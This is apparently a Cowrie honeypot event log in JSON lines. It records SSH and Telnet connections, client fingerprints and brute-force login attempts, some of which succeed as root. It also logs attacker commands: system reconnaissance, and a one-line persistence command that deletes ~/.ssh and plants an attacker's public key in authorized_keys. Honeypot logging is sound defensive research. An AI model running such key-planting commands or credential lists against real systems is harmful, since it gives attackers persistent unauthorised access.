{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:41.448953Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:42.088657Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T03:52:42.089484Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:42.351441Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:42.889595Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T03:52:42.890241Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:43.150497Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:43.760535Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T03:52:43.761184Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:44.023273Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:44.599671Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T03:52:44.600354Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:44.861172Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:45.398037Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T03:52:45.398804Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:45.660016Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:46.272890Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T03:52:46.273565Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:46.536208Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.closed","duration":"26.8","message":"Connection lost after 26.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:46.537458Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55322,"dst_ip":"1.2.3.4","dst_port":22,"session":"d34546b2e672","protocol":"ssh","message":"New connection: 212.227.235.229:55322 (1.2.3.4:22) [session: d34546b2e672]","sensor":"my-vps","timestamp":"2025-08-26T03:52:47.326075Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:52:47.326793Z","src_ip":"212.227.235.229","session":"d34546b2e672"}
{"eventid":"cowrie.session.closed","duration":14.009642839431763,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:47.332926Z","src_ip":"212.227.235.229","session":"5296cdc34e60"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:52:48.262893Z","src_ip":"212.227.235.229","session":"d34546b2e672"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45626,"dst_ip":"1.2.3.4","dst_port":23,"session":"3f733ed71ca2","protocol":"telnet","message":"New connection: 212.227.235.229:45626 (1.2.3.4:23) [session: 3f733ed71ca2]","sensor":"my-vps","timestamp":"2025-08-26T03:52:49.602568Z"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle2025","message":"login attempt [oracle/oracle2025] failed","sensor":"my-vps","timestamp":"2025-08-26T03:52:52.377607Z","src_ip":"212.227.235.229","session":"d34546b2e672"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:54.361640Z","src_ip":"212.227.235.229","session":"d34546b2e672"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:56.571430Z","src_ip":"212.227.235.229","session":"8d4f9754b883"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:52:56.617756Z","src_ip":"212.227.235.229","session":"3738b7ed56fc"}
{"eventid":"cowrie.session.closed","duration":"29.6","message":"Connection lost after 29.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:56.620113Z","src_ip":"212.227.235.229","session":"3738b7ed56fc"}
{"eventid":"cowrie.session.closed","duration":13.997998714447021,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:53:03.600500Z","src_ip":"212.227.235.229","session":"3f733ed71ca2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45936,"dst_ip":"1.2.3.4","dst_port":23,"session":"3baf38d92446","protocol":"telnet","message":"New connection: 212.227.235.229:45936 (1.2.3.4:23) [session: 3baf38d92446]","sensor":"my-vps","timestamp":"2025-08-26T03:53:03.796142Z"}
{"eventid":"cowrie.session.closed","duration":13.438953638076782,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:53:17.235024Z","src_ip":"212.227.235.229","session":"3baf38d92446"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":56242,"dst_ip":"1.2.3.4","dst_port":22,"session":"da52e25e34ea","protocol":"ssh","message":"New connection: 103.217.145.104:56242 (1.2.3.4:22) [session: da52e25e34ea]","sensor":"my-vps","timestamp":"2025-08-26T03:53:32.446113Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:53:32.447089Z","src_ip":"103.217.145.104","session":"da52e25e34ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:53:32.719960Z","src_ip":"103.217.145.104","session":"da52e25e34ea"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa1234567.","message":"login attempt [root/Aa1234567.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:53:33.834972Z","src_ip":"103.217.145.104","session":"da52e25e34ea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:53:34.390776Z","src_ip":"103.217.145.104","session":"da52e25e34ea"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:53:34.391574Z","src_ip":"103.217.145.104","session":"da52e25e34ea"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:53:34.392503Z","src_ip":"103.217.145.104","session":"da52e25e34ea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:53:34.846954Z","src_ip":"103.217.145.104","session":"da52e25e34ea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:53:35.482257Z","src_ip":"103.217.145.104","session":"da52e25e34ea"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T03:53:35.482949Z","src_ip":"103.217.145.104","session":"da52e25e34ea"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T03:53:35.752599Z","src_ip":"103.217.145.104","session":"da52e25e34ea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:53:35.753592Z","src_ip":"103.217.145.104","session":"da52e25e34ea"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":56252,"dst_ip":"1.2.3.4","dst_port":22,"session":"3526ff8fe710","protocol":"ssh","message":"New connection: 103.217.145.104:56252 (1.2.3.4:22) [session: 3526ff8fe710]","sensor":"my-vps","timestamp":"2025-08-26T03:53:36.024153Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:53:36.026351Z","src_ip":"103.217.145.104","session":"3526ff8fe710"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:53:36.301058Z","src_ip":"103.217.145.104","session":"3526ff8fe710"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T03:53:37.591110Z","src_ip":"103.217.145.104","session":"3526ff8fe710"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:53:38.865906Z","src_ip":"103.217.145.104","session":"3526ff8fe710"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":56256,"dst_ip":"1.2.3.4","dst_port":22,"session":"6adb96b872f9","protocol":"ssh","message":"New connection: 103.217.145.104:56256 (1.2.3.4:22) [session: 6adb96b872f9]","sensor":"my-vps","timestamp":"2025-08-26T03:53:39.125527Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:53:39.126769Z","src_ip":"103.217.145.104","session":"6adb96b872f9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:53:39.862695Z","src_ip":"103.217.145.104","session":"6adb96b872f9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:53:40.941726Z","src_ip":"103.217.145.104","session":"6adb96b872f9"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":37690,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0f78f5a8fe4","protocol":"ssh","message":"New connection: 68.183.87.241:37690 (1.2.3.4:22) [session: d0f78f5a8fe4]","sensor":"my-vps","timestamp":"2025-08-26T03:53:41.173198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:53:41.174548Z","src_ip":"68.183.87.241","session":"d0f78f5a8fe4"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:53:41.202494Z","src_ip":"103.217.145.104","session":"6adb96b872f9"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:53:41.204138Z","src_ip":"103.217.145.104","session":"da52e25e34ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:53:41.423940Z","src_ip":"68.183.87.241","session":"d0f78f5a8fe4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52626,"dst_ip":"1.2.3.4","dst_port":22,"session":"c30199150061","protocol":"ssh","message":"New connection: 212.227.235.229:52626 (1.2.3.4:22) [session: c30199150061]","sensor":"my-vps","timestamp":"2025-08-26T03:53:41.541718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:53:41.542698Z","src_ip":"212.227.235.229","session":"c30199150061"}
{"eventid":"cowrie.login.failed","username":"localhost","password":"Jay56","message":"login attempt [localhost/Jay56] failed","sensor":"my-vps","timestamp":"2025-08-26T03:53:42.465013Z","src_ip":"68.183.87.241","session":"d0f78f5a8fe4"}
